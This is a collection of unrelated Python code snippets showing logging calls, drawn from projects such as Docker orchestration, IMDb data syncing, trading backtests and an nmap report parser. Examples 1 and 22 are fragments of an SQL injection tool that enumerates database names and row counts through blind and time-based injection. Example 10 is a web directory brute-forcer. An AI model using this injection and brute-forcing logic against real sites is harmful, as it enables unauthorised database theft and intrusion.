Example #1
    def get_content_count(self, database_name, table_name):

        # Start injecting the content count
        logger.debug("Start sqli table %s content amount..." % table_name)

        logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table's %s content amount sqli..." % table_name)

            # Inject the number of rows
            content_count = normal_injection(select="count(*)",
                                             source=database_name + "." + table_name,
                                             dealpayload=self.dealpayload,
                                             data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                             )
            logger.debug("Content account sqli success...The count is %d..." % content_count)

            # Return the content count
            logger.info("[*] content count: %d" % content_count)
            return content_count

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start table's %s content amount sqli..." % table_name)

            retVal = build_injection(select="count(*)",
                                     source=database_name + "." + table_name,
                                     dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                     isCount=True, sqlirequest=self.sqlirequest)
            content_count = int(retVal)

            logger.debug("Content account sqli success...The content_count is %d..." % content_count)
            logger.info("[*] content_count: %d" % content_count)

            # Return the content count
            logger.info("[*] content count: %d" % content_count)
            return content_count

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            logger.debug("Start table's %s content amount sqli..." % table_name)

            retVal = time_injection(select="count(*)",
                                    source=database_name + "." + table_name,
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                    isCount=True, sqlirequest=self.sqlirequest)
            content_count = int(retVal)

            logger.debug("Content account sqli success...The content_count is %d..." % content_count)
            logger.info("[*] content_count: %d" % content_count)

            # Return the content count
            logger.info("[*] content count: %d" % content_count)
            return content_count
Example #2
    def export2lmdb(self, lmdb_host, lmdb_dbname):
        """ 匯出IMDB資料庫的資料到LMDB

        :param lmdb_host:
        :param lmdb_dbname:
        :return:
        """

        logger.info('export to lmdb')

        since = 0
        i = 0

        while True:
            movies = self.DbOperator.get_movies_to_export_lmdb(since, limit=self.DbOperator.LIMIT)
            if movies:
                for movie in movies:
                    movieid = movie[0]
                    imdbid = 'tt%07d' % int(movie[1])
                    i += 1
                    try:
                        imdbmovie = self.IMDbObj.get_movie(imdbid, movieid)
                        imdbmovie.save2db(lmdb_host, lmdb_dbname)
                        logger.info(
                            '%d, %s, %s, %s, %s' % (i, movieid, imdbid, imdbmovie['url'], imdbmovie['posterurl'])
                        )
                    except Exception as e:
                        logger.error('save db error: %s \r\n %s' % (imdbid, str(e)))

                since += self.DbOperator.LIMIT
            else:
                break
Example #3
    def bootstrap(self):
        self.update_nodes()
        _updated = False
        for name, node in self.nodes.items():
            try: node.connect()
            except Exception: pass
            if not node.exists or not node.name:
                L.info("Node not found, creating a new node")
                self.create_node(name, self.cfg)
                # Unset it so we really refresh it
                _updated = True
            node.cleanup_dead()
            L.ok("Node %s alive and ready!"%name)
        if _updated: self.update_nodes()

        played = []
        for s in self.base_services:
            played += self.play_service(self.nodes, s)

        if played:
            L.ok("Base services setup, cooling down while everything starts...")
            time.sleep(30)
        for s in self.dj_services + self.user_services:
            self.play_service(self.nodes, s)

        L.ok("Node setup OK!")
        return True
Example #4
def kill_containers(context):
    cfg = context.obj
    for manager in cfg['managers']:
        mgr = cfg['project'].manager_for(manager)
        for name, node in mgr.nodes.items():
            L.info('Stopping %d containers on node %s'%(len(node.containers),
                                                        name))
            node.stop_container()
Example #5
    def download_listfile(self):
        """ 下載IMDB的資料庫文字檔,http://www.imdb.com/interfaces

        :return:
        """
        logger.info('download listfile')
        self.Downloader.download()
        logger.info('download listfile is success!')
Example #6
def kill_services(context):
    cfg = context.obj
    for manager in cfg['managers']:
        mgr = cfg['project'].manager_for(manager)
        for s_name in mgr.user_services:
            for name, node in mgr.nodes.items():
                containers = node.running_services.get(s_name, [])
                L.info('Stopping %d containers running %s on node %s'%
                       (len(containers), s_name, name))
                for container in containers:
                    node.stop_container(id=container)
Example #7
def setDetection(new):
    if re.search("true", str(new)):
        status = True
        logger.info("DETECTION!")
    elif re.search("false", str(new)):
            status = False
            logger.info("DETECTION!")
    else:
        logger.warn("Invalid status %s for DETECTION" %(new))
        return
    global DETECTION
    DETECTION = status
Example #8
 def play_service(self, nodes, name):
     service = self.services[name]
     schedules = service.schedule(nodes)
     if len(schedules):
         L.info("Starting service %s %s times on %d nodes"%(
             name, len(schedules), len(nodes)))
         for node, schedule in schedules:
             self.play_by_schedule(node, schedule)
         L.ok("Service %s started OK"%name)
     else:
         L.ok("Service %s was running OK"%name)
     return schedules
Example #9
def setActive(new):
    #if(newStatus is False or newStatus is "False" or newStatus is "false" or newStatus is 0 or newStatus is "0"):
    if re.search("false", str(new)):
        status = False
        logger.info("Alarm deactivated")
    #elif(newStatus is True or newStatus is "True" or newStatus is "true" or newStatus is 1 or newStatus is "1"):
    elif re.search("true", str(new)):
        status = True
        logger.info("Alarm activated")
    else:
        logger.warn("Invalid status %s" %(new))
        return
    global active
    active = status
Example #10
def dir_bruter(word_queue, target_url, stime, extensions=None, pbar=None):

    while not word_queue.empty():

        pbar.update(1)
        
        attempt = word_queue.get()

        attempt_list = []

        # Check for a file extension; if there is none, it is a path we want to brute-force
        # if "." not in attempt:
        # 	attempt_list.append("%s/" % attempt)
        # else:
        attempt_list.append("%s" % attempt)

        # If we also want to brute-force extensions
        if extensions:
            for extension in extensions:
                if extension == ".swp":
                    attempt_list.append("/.%s%s" % (attempt.strip('/'), extension))
                else:
                    attempt_list.append("%s%s" % (attempt, extension))

        # Iterate over the list of files we want to try
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))
            # print url
            try:
                headers = {}
                headers["User-Agent"] = conf['ua']
                r = urllib2.Request(url, headers=headers)
                # pbar.update(1)
                try:
                    response = urllib2.urlopen(r, timeout=2)
                except:
                    logger.error("Time out...")
                    continue  # the request may hang otherwise

                # Sleep after each request
                time.sleep(stime)

                if response.code != 404:
                    logger.info("Get !!!!" + url)
                    tqdm.write("[%d] => %s" % (response.code, url))

            except urllib2.URLError as e:
                if hasattr(e, 'code') and e.code != 404:
                    tqdm.write("!!! %d => %s" % (e.code, url))
Example #11
    def backup(self, dbname):
        logger.info('backup db')
        self.backupdb(dbname)
        logger.info('backup db is success!')

        logger.info('test backup db file')
        sys.stdout.flush()
        self.test_backupfile(dbname)
        logger.info('test backupfile is success!')

        self.move_backupfile(dbname)
Example #12
def serv_forever(sub_p, pub_p):
    context = zmq.Context()
    pub_s = context.socket(zmq.PUB)
    pub_s.bind('tcp://*:{PUB_PORT}'.format(PUB_PORT=pub_p))

    sub_s = context.socket(zmq.SUB)
    sub_s.setsockopt(zmq.SUBSCRIBE, '')
    sub_s.bind('tcp://*:{SUB_PORT}'.format(SUB_PORT=sub_p))

    poller = zmq.Poller()
    poller.register(sub_s, zmq.POLLIN)

    while 1:
        socks = dict(poller.poll(360000))
        if socks:
            for sock, event in socks.iteritems():
                if sock is sub_s:
                    frame = sub_s.recv_multipart()
                    logger.info('MESSAGE:%s', frame)
                    pub_s.send_multipart(frame)
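A quick smoke test for the forwarder above (a sketch; localhost and the b'hello' payload are illustrative). One PUB socket feeds the forwarder's SUB port, and a SUB socket connected to the forwarder's PUB port should get the frame back:

    import time
    import zmq

    def smoke_test(sub_p=9021, pub_p=9022):
        ctx = zmq.Context()

        out_s = ctx.socket(zmq.PUB)      # feeds the forwarder's SUB socket
        out_s.connect('tcp://127.0.0.1:%d' % sub_p)

        in_s = ctx.socket(zmq.SUB)       # listens on the forwarder's PUB socket
        in_s.setsockopt(zmq.SUBSCRIBE, b'')
        in_s.connect('tcp://127.0.0.1:%d' % pub_p)

        time.sleep(0.5)                  # give subscriptions time to propagate
        out_s.send_multipart([b'hello'])
        print(in_s.recv_multipart())     # expect [b'hello']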
Example #13
 def create_node(self, name, cfg=None, options=None):
     if not cfg: cfg = {}
     if not options: options = {}
     else: cfg.update(options)
     options['provider'] = cfg.get('provider', {'name': 'local'})
     iaas = options['provider'].get('driver', 'virtualbox')
     services = options['services'] = options.get('services', [])
     L.info("Creating new machine %s on %s"%(name, iaas))
     swarm = cfg.get('swarm-token', '')
     extra = ' '.join(options['provider'].get('extra', []))
     if not len(self.running_nodes):
         swarm_extra = ' --swarm --swarm-master --swarm-discovery token://%s'%swarm
     else:
         swarm_extra = ' --swarm --swarm-discovery token://%s'%swarm
     command = "docker-machine create --driver %s %s %s"%(
         iaas, extra, name)
     output = call(command)
     L.ok("Done creating %s on %s!"%(name, iaas))
     self.update_nodes()
Example #14
 def run(self, *args, **kwargs):
     build = kwargs.pop('build', None)
     image = kwargs.get('image', None)
     if build:
         L.info("Building image %s on node %s"%(image, self.name))
         self.call_docker("build %s"%build)
     if image:
         tagged = ':' in image and image or '%s:latest'%image
          if tagged not in self.local_images():
             L.info("Can't find image %s, attempting to pull..."%image)
             self.call_docker("pull %s"%image)
         elif ':' in image and image.endswith('latest'):
             L.info("Image %s tagged 'latest', updating..."%image)
              try: self.call_docker("pull %s"%image)
              except Exception: pass
         kwargs['image'] = image
     command_line = 'docker %s run %s %s'%(self.node_connect_str,
         image, kwargs.get('command','') or '')
     L.v("Using docker-py API to create container, you can run this --")
     L.v(command_line)
     dns = kwargs.pop('dns', None)
     dns_search = kwargs.pop('dns_search', None)
     privileged = kwargs.pop('privileged', '') == 'ceph' and 'ceph/' in image
     container = self.client.create_container(*args, **kwargs)
     return self.client.start(container, dns=dns, privileged=privileged), container
Example #15
    def update_movie_imdbid(self):
        """ 更新IMDB資料庫電影的IMDBID

        如果更新某部電影的IMDBID,出現錯誤連續達到10次,則不繼續嘗試更新IMDBID(可能會是網路等問題)

        :return:
        """

        logger.info('update imdb_id field')

        count = 0
        try_times = 0
        max_try = 10

        while True:
            movies = self.DbOperator.get_null_imdbid_movies()
            if len(movies) == 0:
                break

            for movie in movies:
                count += 1

                try:
                    logger.info('%s: %s' % (count, self.get_imdbid_result(movie[0])))
                    try_times = 0  # reset on success so only consecutive failures count
                except Exception:
                    try_times += 1
                    time.sleep(3)
                    if try_times == max_try:
                        logger.error(traceback.format_exc())
                        return

        logger.info('import db to table is success!')
Example #16
def main():
    # main

    # activate API
    if api.lunch():
        logger.info("API started")
    else:
        logger.error("API failed start")

    GPIO.setmode(GPIO.BOARD)
    pir = 26
    GPIO.setup(pir, GPIO.IN)
    logger.info("Application started")
    while True:
        while active.getActive():
            if GPIO.input(pir):
                time.sleep(1)
                if GPIO.input(pir):
                    active.setDetection("true")
                    sender.emailAlert()
                    active.setDetection("false")
                    time.sleep(0.2)
Example #17
    def _update_imdb_movies(self, getdata_func):
        """ 更新imdb電影資訊

        利用imdbpy去取得最新的電影資訊,然後更新資料庫

        :param getdata_func: 取得要更新的imdb電影
        :return:
        """
        i = 0
        since = 0
        while True:
            movies = getdata_func(limit=self.DbOperator.LIMIT, since=since)
            if movies:
                for movie in movies:
                    imdbid = movie[0]
                    try:
                        # Check that the imdbid has a valid format
                        if not re.match(r'tt\d{7}', imdbid):
                            raise Exception('not a valid imdbid')
                        if self.DbOperator.is_error_imdbid_movie(imdbid):
                            logger.info('error imdbid: %s' % imdbid)
                            continue
                        imdbmovie = self.IMDbObj.get_movie(imdbid)
                        imdbmovie.save2db(self.DbOperator.HOST, self.DbOperator.DB)
                        i += 1
                        logger.info(
                            (i, imdbid, imdbmovie['url'], imdbmovie['rating'], imdbmovie['posterurl']).__str__()
                        )
                    except Exception as e:
                        time.sleep(30)
                        # If the IMDB site is reachable but no data comes back, the imdbid is probably wrong, so clear it
                        if self.IMDbObj.is_network_ok():
                            self.DbOperator.clear_imdbid(imdbid)
                            logger.info('clear imdbid: %s' % imdbid)
                        else:
                            logger.warning('update imdb fail: %s' % (str(e)))
                            return

                since += self.DbOperator.LIMIT
                logger.info('exported count: %d' % i)
            else:
                break
Example #18
    def import_listfile(self):
        """ 將IMDB的資料庫文字檔匯進DB

        如果匯入時發生問題,則利用上次的備份檔進行還原

        :return:
        """
        logger.info('import listfile to db')

        try:
            self.make_csvdir()
            imdbpy2sql_path = os.path.normpath('%s/updateimdb/bin/' % DIR_CRONTAB)
            cmd = 'python %s/imdbpy2sql.py -d %s -u %s -c %s -i table' \
                  % (imdbpy2sql_path, self.Downloader.get_download_dir_path(), self.DbOperator.URI, self.get_csvdir())
            subprocess.check_call(cmd, shell=True)
        except Exception:
            logger.error('error occurred during import listfile to db, try to restore the older db')
            self.DbBackup.restoredb(self.DbOperator.DB, '%s/%s.bak' % (self.DbBackup.BACKUPDIR, self.DbOperator.DB))
            logger.info('restore success!')
            raise

        logger.info('import listfile to db is success!')
Example #19
    def play_by_schedule(self, node, schedule):
        s = schedule
        ip = s['ip']
        name = s['node']
        role = s.get('role', None)
        number = s.get('number', None)
        s['leader_ip'] = self.leader_ip

        s['container_name'] = container_name = s.get('container_name',
                    '%(service)s.%(node)s.%(domain)s')%(s)
        labels = {'service': s['service']}
        labels.update(s.get('labels',{}))
        ports = map(str, s.get('ports', []))
        dynamic = map(str, s.get('dynamic_ports', []))
        expose = []
        bind = {}
        for p in ports:
            if '/' in p:
                p, proto = p.split('/')
            else: proto = 'tcp'
            if ':' in p:
                h_p, c_p = map(int, p.split(':'))
            else:
                h_p = c_p = int(p)
            if proto in ['tcp', 'both']:
                expose.append(c_p)
                bind[c_p] = (node.ip, h_p)
            if proto in ['udp', 'both']:
                expose.append( (c_p, 'udp') )
                bind['%s/udp'%c_p] = (node.ip, h_p)
            L.info('Opening static port on %s:%s to %s'%(node.ip, h_p, c_p))
        for p in dynamic:
            if '/' in p:
                p, proto = p.split('/')
            else: proto = 'tcp'
            c_p = int(p)
            if proto in ['tcp', 'both']:
                expose.append(c_p)
                bind[c_p] = (node.ip, )
            if proto in ['udp', 'both']:
                expose.append( (c_p, 'udp') )
                bind['%s/udp'%c_p] = (node.ip, )
            L.info('Opening dynamic port on %s to %s'%(node.ip, c_p))
        node.cleanup_dead(name=container_name)
        if not node.is_running(name=container_name):
            build = s.get('build', None)
            image = build and s.get('service', '') or s.get('image', None)
            instance = node.run(
                name=container_name, hostname=container_name,
                image=image, build=build, ports=expose,
                command=s.get('command', '')%s,
                environment=[e%s for e in s.get('environment', [])],
                labels=labels,
                host_config=node.client.create_host_config(
                    binds=s.get('volumes', None),
                    port_bindings=bind,
                    dns=[self.leader_ip],
                    dns_search=[self.cfg.get('domain', None)],
                    network_mode=s.get('network', None),
                )
            )
        else:
            L.debug("Already running %s"%(container_name))
Example #20
    def trading_day(self, day):
        session = self.createSession()
        for symbol, strat in self.strategies.items():
            try:
                signal = strat.get_signal(day) #ToDo: Handle exceptions
            except Exception as e:
                logger.debug("Exception for {} at day {}: {}".format(symbol, day, e))
                continue
            session.add(signal) # Save signals to db for history
            # Get asset
            asset = self.exchange.get_or_create_asset(session, symbol)
            # Manage open positions
            longs = self.exchange.get_open_long(session, asset)
            for o in longs:
                if o.should_stop(signal.close):
                    logger.info('[Day: {}] Closing long position {} on {} due to stop loss'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, o.stop_loss)
                    session.add(log)
                    continue

                # If signal is SELL, close the long position
                if signal.signal == SignalType.SELL:
                    logger.info(
                        '[Day: {}] Closing long position {} on {} due to SELL signal'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, signal.close)
                    session.add(log)
                    continue
            shorts = self.exchange.get_open_short(session, asset)
            for o in shorts:
                # If close meets stop loss, close position
                if o.should_stop(signal.close):
                    logger.info(
                        '[Day: {}] Closing short position {} on {} due to stop loss'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, o.stop_loss)
                    session.add(log)
                    continue
                # If signal is BUY we're going to lose money, so we close position
                if signal.signal == SignalType.BUY:
                    logger.info(
                        '[Day: {}] Closing short position {} on {} due to BUY signal'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, signal.close)
                    session.add(log)
                    continue
                # If signal is HOLD and the position is old, close it
                if o.get_age_in_days(day) > 2 and signal.signal == SignalType.HOLD:
                    logger.info('[Day: {}] Closing short position {} on {} due to age'.format(day, o.id, o.symbol))
                    _, log = self.exchange.close_order(day, asset, o, signal.close)
                    session.add(log)
                    continue
            ## Open new positions
            # Determine position sizing
            position_coins = asset.position_size(signal.close, self.order_size)
            # Open the order
            if signal.signal == SignalType.BUY:
                logger.info(
                    '[Day: {}] Opening long position on {} due to BUY signal [Close {}, Price {}, Coins {}]'.format(
                        day, symbol, signal.close, position_coins * signal.close, position_coins))
                o, log = self.exchange.open_order(day, OrderType.LONG, asset, position_coins, signal.close,
                                        stop_loss=-0.01)  # Stop loss is -1%
                if not o:
                    logger.error("LONG FAILED")
                else:
                    session.add(o)
                    session.add(log)
            elif signal.signal == SignalType.SELL:
                logger.info(
                    '[Day: {}] Opening short position on {} due to SELL signal [Close {}, Price {}, Coins {}]'.format(
                        day, symbol, signal.close, position_coins * signal.close, position_coins))
                o, log = self.exchange.open_order(day, OrderType.SHORT, asset, position_coins, signal.close,
                                        stop_loss=0.01)  # Stop loss is +1%
                if not o:
                    logger.error("SHORT FAILED")
                else:
                    session.add(o)
                    session.add(log)
            session.add(Equity(
                day=day,
                symbol=symbol,
                equity=asset.equity(signal.close),
                longs=asset.long_orders,
                shorts=asset.short_orders
            ))
            session.commit()
Example #21
def build_model(dataset,
                pipeline,
                experiment,
                current_target='class',
                test_size=0.3):
    models_dir = './results/{}_{}_{}/models/'.format(dataset, pipeline,
                                                     experiment)
    reports_dir = './results/{}_{}_{}/reports/'.format(dataset, pipeline,
                                                       experiment)
    experiment_index_file = './results/{}_{}_{}/index.json'.format(
        dataset, pipeline, experiment)
    log_file = './results/{}_{}_{}/model_build.log'.format(
        dataset, pipeline, experiment)

    scoring = make_scorer(precision_score, zero_division=1, average='micro')
    os.makedirs(models_dir, exist_ok=True)
    os.makedirs(reports_dir, exist_ok=True)
    # Setup logging
    logger.setup(filename=log_file,
                 filemode='w',
                 root_level=logging.DEBUG,
                 log_level=logging.DEBUG,
                 logger='build_model')
    index_name = 'index'
    if '.' in dataset:
        splits = dataset.split(".")
        dataset = splits[0]
        index_name = splits[1]
    # Load the dataset index
    dataset_index = load_dataset(dataset,
                                 return_index=True,
                                 index_name=index_name)
    # Dynamically import the pipeline we want to use for building the model
    logger.info('Start experiment: {} using {} on {} with target {}'.format(
        experiment, pipeline, dataset, current_target))
    reports = ReportCollection(dataset, pipeline, experiment)
    for _sym, data in {'BTC': dataset_index['BTC']}.items():
        try:
            logger.info('Start processing: {}'.format(_sym))
            features = pd.read_csv(data['csv'],
                                   sep=',',
                                   encoding='utf-8',
                                   index_col='Date',
                                   parse_dates=True)
            targets = pd.read_csv(data['target_csv'],
                                  sep=',',
                                  encoding='utf-8',
                                  index_col='Date',
                                  parse_dates=True)

            # Drop columns whose values are all NaN, as well as rows with ANY nan value, then
            # replace infinity values with nan so that they can later be imputed to a finite value
            features = features.dropna(
                axis='columns', how='all').dropna().replace([np.inf, -np.inf],
                                                            np.nan)
            target = targets.loc[features.index][current_target]

            #X_train, X_test, y_train, y_test = train_test_split(features, target, shuffle=False, test_size=test_size)

            all_size = features.shape[0]
            train_size = int(all_size * (1 - test_size))
            features = detabularise(
                features[[c for c in features.columns if 'close' in c]])
            X_train = features.iloc[0:train_size]
            y_train = target.iloc[0:train_size]
            X_test = features.iloc[train_size:all_size]
            y_test = target.iloc[train_size:all_size]
            # Summarize distribution
            logger.info("Start Grid search")
            clf = ShapeletTransformClassifier(time_contract_in_mins=5)
            clf.fit(X_train, y_train)
            print('{} Score: {}'.format(_sym, clf.score(X_test, y_test)))
            pred = clf.predict(X_test)
            print(classification_report(y_test, pred))
            logger.info("End Grid search")

            logger.info("--- {} end ---".format(_sym))
        except Exception as e:
            logger.error(
                "Exception while building model pipeline: {} dataset: {} symbol: {}\nException:\n{}"
                .format(pipeline, dataset, _sym, e))
            traceback.print_exc()
    return reports
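build_model splits the series chronologically instead of using the commented-out train_test_split, since shuffling would leak future prices into training. The same split, factored into a helper (a sketch, not part of the original):

    def time_split(features, target, test_size=0.3):
        # Keep the earliest (1 - test_size) fraction for training,
        # the most recent rows for testing
        split = int(features.shape[0] * (1 - test_size))
        return (features.iloc[:split], features.iloc[split:],
                target.iloc[:split], target.iloc[split:])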
Example #22
    def get_database(self):

        logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database amount sqli...")
            # First inject the number of databases

            databases_number = normal_injection(select='COUNT(`SCHEMA_NAME`)',
                                                source='information_schema.SCHEMATA',
                                                dealpayload=self.dealpayload,
                                                data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                )

            logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
            print "[*] databases_number: %d" % databases_number

            # Each iteration extracts one database
            for i in trange(int(databases_number), desc="Database sqli...", leave=False, disable=True):
                # First the length of the database name
                logger.debug("Start %dth database length sqli..." % (i + 1))

                databases_name_len = normal_injection(select='length(`SCHEMA_NAME`)',
                                                      source='information_schema.SCHEMATA',
                                                      limit=i,
                                                      dealpayload=self.dealpayload,
                                                      data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                      )

                logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
                logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

                # Then inject the database name
                logger.debug("Start %dth database name sqli..." % (i + 1))

                databases_name = normal_injection(select='`SCHEMA_NAME`',
                                                  source='information_schema.SCHEMATA', limit=i,
                                                  dealpayload=self.dealpayload,
                                                  data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                                  )

                logger.debug(
                    "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

                # Append databases_name to the list unless it is information_schema
                if databases_name != "information_schema":
                    self.databases_name.append(databases_name)
                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database amount sqli...")

            retVal = build_injection(select="COUNT(`SCHEMA_NAME`)",
                                     source="information_schema.SCHEMATA",
                                     dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                     isCount=True, sqlirequest=self.sqlirequest)
            databases_number = int(retVal)

            logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
            logger.info("[*] databases_number: %d" % databases_number)

            for i in range(0, int(databases_number)):

                logger.debug("Start %dth database length sqli..." % (i + 1))
                # Then inject the length of databases_name

                retVal = build_injection(select="length(`SCHEMA_NAME`)",
                                         source="information_schema.SCHEMATA",
                                         limit=i,
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                         isCount=True, sqlirequest=self.sqlirequest)
                databases_name_len = int(retVal)

                logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
                logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

                # Then inject the database name
                # Reset databases_name
                databases_name = ""
                logger.debug("Start %dth database sqli..." % (i + 1))
                for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):

                    retVal = build_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
                                             source="information_schema.SCHEMATA",
                                             limit=i,
                                             dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                             isStrings=True, sqlirequest=self.sqlirequest)
                    databases_name += chr(retVal)

                logger.debug(
                    "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

                # Append databases_name to the list unless it is information_schema
                if databases_name != "information_schema":
                    self.databases_name.append(databases_name)

                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)
            logger.debug("Start database amount sqli...")

            retVal = time_injection(select="COUNT(`SCHEMA_NAME`)",
                                    source="information_schema.SCHEMATA",
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                    isCount=True, sqlirequest=self.sqlirequest)
            databases_number = int(retVal)

            logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
            logger.info("[*] databases_number: %d" % databases_number)

            for i in range(0, int(databases_number)):
                logger.debug("Start %dth database length sqli..." % (i + 1))

                # Then inject the length of databases_name

                retVal = time_injection(select="length(`SCHEMA_NAME`)",
                                        source="information_schema.SCHEMATA",
                                        limit=i,
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                        isCount=True, sqlirequest=self.sqlirequest)
                databases_name_len = int(retVal)

                logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
                logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

                # Then inject the database name
                # Reset databases_name
                databases_name = ""
                logger.debug("Start %dth database sqli..." % (i + 1))

                for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):
                    retVal = time_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
                                            source="information_schema.SCHEMATA",
                                            limit=i,
                                            dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                            isStrings=True, sqlirequest=self.sqlirequest)
                    databases_name += chr(retVal)

                logger.debug(
                    "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

                # Append databases_name to the list unless it is information_schema
                if databases_name != "information_schema":
                    self.databases_name.append(databases_name)

                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

        databases_name = ','.join(self.databases_name)
        print "[*] databases_name list: " + databases_name
Example #23
from threading import Thread
from time import sleep
from lib.log import logger

logger.info("Loading library: {0}".format(__name__))

pins = {"1": 10, "2": 9, "3": 11, "4": 22}
OUT = 1
IN = 2

interrupt = None


def setup(gpio_pin, in_out):
    pass


def output(gpio_pin, high_low):
    for v in pins:
        if pins[v] == gpio_pin:
            logger.debug("Relay[{0}] is {1}".format(
                v, "HIGH" if high_low else "LOW"))


def main():
    output(11, True)
    output(9, False)


def add_interrupt_callback(gpio_pin, func, **kwargs):
    global interrupt
Example #24
 def run(self): # defined for threading; can live here or be overridden in a child class
     self.process()
     self.d = self.get_hostnames()
     self.e = self.get_emails()
     logger.info("{0} found {1} domain(s) and {2} email(s)".format(self.engine_name,len(self.d),len(self.e)))
     return self.d, self.e
Example #25
def main():
    result = {}
    for _sym in SYMBOLS:
        dataset = 'data/result/datasets/csv/{}.csv'.format(_sym)
        df = pd.read_csv(dataset,
                         sep=',',
                         encoding='utf-8',
                         index_col='Date',
                         parse_dates=True)
        df = df.replace([np.inf, -np.inf], np.nan).dropna()
        X = df[df.columns.difference(['target', 'target_pct', 'target_label'])]
        y = df['target']
        #print("======"+_sym+"======")
        #print(X.info())

        # Variance Threshold
        sel = VarianceThreshold()
        sel.fit_transform(X)
        sup = sel.get_support()
        X = X[[name for flag, name in zip(sup, X.columns) if flag]]
        ## SelectKBest
        sel = SelectKBest(chi2, k=30)
        sX = scale(X, scaler='minmax')
        sel.fit_transform(sX, y)
        sup = sel.get_support()
        sX = sX[[name for flag, name in zip(sup, sX.columns) if flag]]

        ## Recursive Feature Elimination
        # Create the RFE object and compute a cross-validated score.
        # The "accuracy" scoring is proportional to the number of correct
        # classifications
        # model = SVC(kernel="linear")
        # rfecv = RFECV(estimator=model, step=1, cv=StratifiedKFold(2), scoring='accuracy', n_jobs=-1, verbose=1)
        # rfecv.fit(X, y)
        # X = X[[name for flag, name in zip(rfecv.support_, X.columns) if flag]]
        ### Genetic
        # estimator = MLPClassifier(**{
        #     'hidden_layer_sizes': (10, 4),
        #     'solver': 'lbfgs',
        #     'learning_rate': 'constant',
        #     'learning_rate_init': 0.001,
        #     'activation': 'logistic'
        # })
        estimator = LogisticRegression(solver="liblinear", multi_class="ovr")
        gscv = GeneticSelectionCV(estimator,
                                  cv=2,
                                  verbose=1,
                                  scoring="accuracy",
                                  max_features=30,
                                  n_population=50,
                                  crossover_proba=0.5,
                                  mutation_proba=0.2,
                                  n_generations=80,
                                  crossover_independent_proba=0.5,
                                  mutation_independent_proba=0.05,
                                  tournament_size=3,
                                  n_gen_no_change=10,
                                  caching=True,
                                  n_jobs=-1)
        gscv = gscv.fit(X, y)
        X = X[[name for flag, name in zip(gscv.support_, X.columns) if flag]]

        #print(X.columns)

        # print("[%s] Optimal number of features : %d Set: %s" % (_sym, rfecv.n_features_, ', '.join(X.columns)))
        # plt.figure()
        # plt.title(_sym + ' SVC RFECV K=2')
        # plt.xlabel("Number of features selected")
        # plt.ylabel("Cross validation score (nb of correct classifications)")
        # plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)
        # plt.show()

        logger.info("{}: {}".format(_sym, X.columns))
        result[_sym] = {
            'dataset': dataset,
            'columns_genetic_lr_30': [c for c in X.columns],
            'columns_kbest_30': [c for c in sX.columns]
        }
    return result
Example #26
    # open final report file
    with open(csv_filename, 'w') as csvwrite:
        # set field names
        fieldnames = ['IP Address', 'Port/Protocol', 'Domains', 'Operating System', 'OS Version', 'Notes']
        writer = csv.DictWriter(csvwrite, fieldnames=fieldnames, dialect=csv.excel, quoting=csv.QUOTE_ALL)
        
        # write CSV header
        writer.writeheader()

        # iterate through xml(s)
        for xml_report in nmap_xml_reports:
            try:
                # trying to load xml file
                nmap_report = NmapParser.parse_fromfile(xml_report)
                logger.info("%s host(s) loaded from %s" % (len(nmap_report.hosts), xml_report))
            except Exception as e:
                logger.warn("XML file %s corrupted or format not recognized" % xml_report)
                # keep looking for other XML files
                continue

            # start a cumulative dictionary
            results = nmap_combine(nmap_report, results)
            #print "results: %s" % len(results)

        logger.info("Wraping up results")
        for ip_address in results:
            # collecting info for each field
